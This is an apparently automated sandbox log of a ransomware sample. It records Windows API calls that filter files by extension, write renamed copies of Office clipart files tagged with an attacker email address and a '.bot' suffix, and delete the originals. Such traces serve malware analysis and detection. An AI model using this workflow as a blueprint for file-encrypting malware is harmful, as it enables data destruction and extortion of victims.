	[0156.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 63
	[0156.348] lstrlenW (lpString=".jpg") returned 4
	[0156.348] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 63
	[0156.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 63
	[0156.348] lstrlenW (lpString=".doc") returned 4
	[0156.348] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.349] lstrlenW (lpString=".docx") returned 5
	[0156.349] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0156.349] lstrlenW (lpString=".pdf") returned 4
	[0156.349] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.349] lstrlenW (lpString=".xls") returned 4
	[0156.349] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.349] lstrlenW (lpString=".xlsx") returned 5
	[0156.349] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0156.349] lstrlenW (lpString=".ppt") returned 4
	[0156.349] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 63
	[0156.349] lstrlenW (lpString=".zip") returned 4
	[0156.349] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.349] lstrlenW (lpString=".rar") returned 4
	[0156.349] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.349] lstrlenW (lpString=".bz2") returned 4
	[0156.349] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.349] lstrlenW (lpString=".7z") returned 3
	[0156.349] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 63
	[0156.349] lstrlenW (lpString=".dbf") returned 4
	[0156.349] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 63
	[0156.349] lstrlenW (lpString=".1cd") returned 4
	[0156.349] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned 63
	[0156.349] lstrlenW (lpString=".jpg") returned 4
	[0156.349] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.349] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.350] lstrlenW (lpString="J0105240.WMF") returned 12
	[0156.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105240.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.350] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=11532) returned 1
	[0156.350] CloseHandle (hObject=0x38c) returned 1
	[0156.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105240.wmf")) returned 0x20
	[0156.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105240.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105240.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.351] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.351] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105240.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0156.352] GetLastError () returned 0x0
	[0156.352] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x2d0c, lpOverlapped=0x0) returned 1
	[0156.423] WriteFile (in: hFile=0x3bc, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2d10, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2d10, lpOverlapped=0x0) returned 1
	[0156.424] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.425] WriteFile (in: hFile=0x3bc, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.425] SetEndOfFile (hFile=0x3bc) returned 1
	[0156.425] CloseHandle (hObject=0x3bc) returned 1
	[0156.425] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.425] SetEndOfFile (hFile=0x38c) returned 1
	[0156.427] CloseHandle (hObject=0x38c) returned 1
	[0156.427] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.427] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105240.wmf")) returned 1
	[0156.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 63
	[0156.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 63
	[0156.428] lstrlenW (lpString=".doc") returned 4
	[0156.428] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.428] lstrlenW (lpString=".docx") returned 5
	[0156.428] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0156.428] lstrlenW (lpString=".pdf") returned 4
	[0156.428] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.428] lstrlenW (lpString=".xls") returned 4
	[0156.428] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.428] lstrlenW (lpString=".xlsx") returned 5
	[0156.428] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0156.428] lstrlenW (lpString=".ppt") returned 4
	[0156.428] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 63
	[0156.428] lstrlenW (lpString=".zip") returned 4
	[0156.429] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.429] lstrlenW (lpString=".rar") returned 4
	[0156.429] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.429] lstrlenW (lpString=".bz2") returned 4
	[0156.429] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.429] lstrlenW (lpString=".7z") returned 3
	[0156.429] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 63
	[0156.429] lstrlenW (lpString=".dbf") returned 4
	[0156.429] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 63
	[0156.429] lstrlenW (lpString=".1cd") returned 4
	[0156.429] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 63
	[0156.429] lstrlenW (lpString=".jpg") returned 4
	[0156.429] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 63
	[0156.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 63
	[0156.429] lstrlenW (lpString=".doc") returned 4
	[0156.429] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.429] lstrlenW (lpString=".docx") returned 5
	[0156.429] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0156.429] lstrlenW (lpString=".pdf") returned 4
	[0156.429] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.429] lstrlenW (lpString=".xls") returned 4
	[0156.429] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.429] lstrlenW (lpString=".xlsx") returned 5
	[0156.429] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0156.429] lstrlenW (lpString=".ppt") returned 4
	[0156.429] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 63
	[0156.430] lstrlenW (lpString=".zip") returned 4
	[0156.430] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.430] lstrlenW (lpString=".rar") returned 4
	[0156.430] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.430] lstrlenW (lpString=".bz2") returned 4
	[0156.430] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.430] lstrlenW (lpString=".7z") returned 3
	[0156.430] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 63
	[0156.430] lstrlenW (lpString=".dbf") returned 4
	[0156.430] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 63
	[0156.430] lstrlenW (lpString=".1cd") returned 4
	[0156.430] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned 63
	[0156.430] lstrlenW (lpString=".jpg") returned 4
	[0156.430] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.430] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.430] lstrlenW (lpString="J0105250.WMF") returned 12
	[0156.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105250.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0156.457] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=4628) returned 1
	[0156.457] CloseHandle (hObject=0x3c0) returned 1
	[0156.457] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105250.wmf")) returned 0x20
	[0156.498] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105250.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105250.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0156.587] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.587] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105250.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0156.587] GetLastError () returned 0x0
	[0156.587] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1214, lpOverlapped=0x0) returned 1
	[0156.705] WriteFile (in: hFile=0x3e8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1220, lpOverlapped=0x0) returned 1
	[0156.706] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.706] WriteFile (in: hFile=0x3e8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.706] SetEndOfFile (hFile=0x3e8) returned 1
	[0156.973] CloseHandle (hObject=0x3e8) returned 1
	[0156.973] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.973] SetEndOfFile (hFile=0x3d0) returned 1
	[0158.298] CloseHandle (hObject=0x3d0) returned 1
	[0158.298] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.373] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105250.wmf")) returned 1
	[0158.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 63
	[0158.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 63
	[0158.402] lstrlenW (lpString=".doc") returned 4
	[0158.402] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.402] lstrlenW (lpString=".docx") returned 5
	[0158.403] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0158.403] lstrlenW (lpString=".pdf") returned 4
	[0158.403] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.403] lstrlenW (lpString=".xls") returned 4
	[0158.403] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.403] lstrlenW (lpString=".xlsx") returned 5
	[0158.403] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0158.403] lstrlenW (lpString=".ppt") returned 4
	[0158.403] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 63
	[0158.403] lstrlenW (lpString=".zip") returned 4
	[0158.403] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.403] lstrlenW (lpString=".rar") returned 4
	[0158.403] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.403] lstrlenW (lpString=".bz2") returned 4
	[0158.403] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.403] lstrlenW (lpString=".7z") returned 3
	[0158.403] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 63
	[0158.403] lstrlenW (lpString=".dbf") returned 4
	[0158.403] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 63
	[0158.403] lstrlenW (lpString=".1cd") returned 4
	[0158.403] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 63
	[0158.403] lstrlenW (lpString=".jpg") returned 4
	[0158.403] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 63
	[0158.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 63
	[0158.403] lstrlenW (lpString=".doc") returned 4
	[0158.404] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.404] lstrlenW (lpString=".docx") returned 5
	[0158.404] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0158.404] lstrlenW (lpString=".pdf") returned 4
	[0158.404] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.404] lstrlenW (lpString=".xls") returned 4
	[0158.404] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.404] lstrlenW (lpString=".xlsx") returned 5
	[0158.404] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0158.404] lstrlenW (lpString=".ppt") returned 4
	[0158.404] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 63
	[0158.404] lstrlenW (lpString=".zip") returned 4
	[0158.404] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.404] lstrlenW (lpString=".rar") returned 4
	[0158.404] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.404] lstrlenW (lpString=".bz2") returned 4
	[0158.404] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.404] lstrlenW (lpString=".7z") returned 3
	[0158.404] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 63
	[0158.404] lstrlenW (lpString=".dbf") returned 4
	[0158.404] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 63
	[0158.404] lstrlenW (lpString=".1cd") returned 4
	[0158.404] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned 63
	[0158.404] lstrlenW (lpString=".jpg") returned 4
	[0158.404] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.405] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.405] lstrlenW (lpString="J0105336.WMF") returned 12
	[0158.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0158.405] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2900) returned 1
	[0158.405] CloseHandle (hObject=0x3a8) returned 1
	[0158.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf")) returned 0x20
	[0158.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0158.406] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.406] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0158.406] GetLastError () returned 0x0
	[0158.407] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xb54, lpOverlapped=0x0) returned 1
	[0158.498] WriteFile (in: hFile=0x3a4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xb60, lpOverlapped=0x0) returned 1
	[0158.500] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.500] WriteFile (in: hFile=0x3a4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.500] SetEndOfFile (hFile=0x3a4) returned 1
	[0158.500] CloseHandle (hObject=0x3a4) returned 1
	[0158.500] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.500] SetEndOfFile (hFile=0x3a8) returned 1
	[0158.502] CloseHandle (hObject=0x3a8) returned 1
	[0158.503] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.503] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf")) returned 1
	[0158.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63
	[0158.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63
	[0158.504] lstrlenW (lpString=".doc") returned 4
	[0158.504] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.504] lstrlenW (lpString=".docx") returned 5
	[0158.504] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0158.504] lstrlenW (lpString=".pdf") returned 4
	[0158.504] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.504] lstrlenW (lpString=".xls") returned 4
	[0158.504] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.504] lstrlenW (lpString=".xlsx") returned 5
	[0158.504] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0158.504] lstrlenW (lpString=".ppt") returned 4
	[0158.504] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63
	[0158.504] lstrlenW (lpString=".zip") returned 4
	[0158.504] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.504] lstrlenW (lpString=".rar") returned 4
	[0158.504] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.504] lstrlenW (lpString=".bz2") returned 4
	[0158.504] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.504] lstrlenW (lpString=".7z") returned 3
	[0158.504] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63
	[0158.504] lstrlenW (lpString=".dbf") returned 4
	[0158.505] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63
	[0158.505] lstrlenW (lpString=".1cd") returned 4
	[0158.505] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63
	[0158.505] lstrlenW (lpString=".jpg") returned 4
	[0158.505] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63
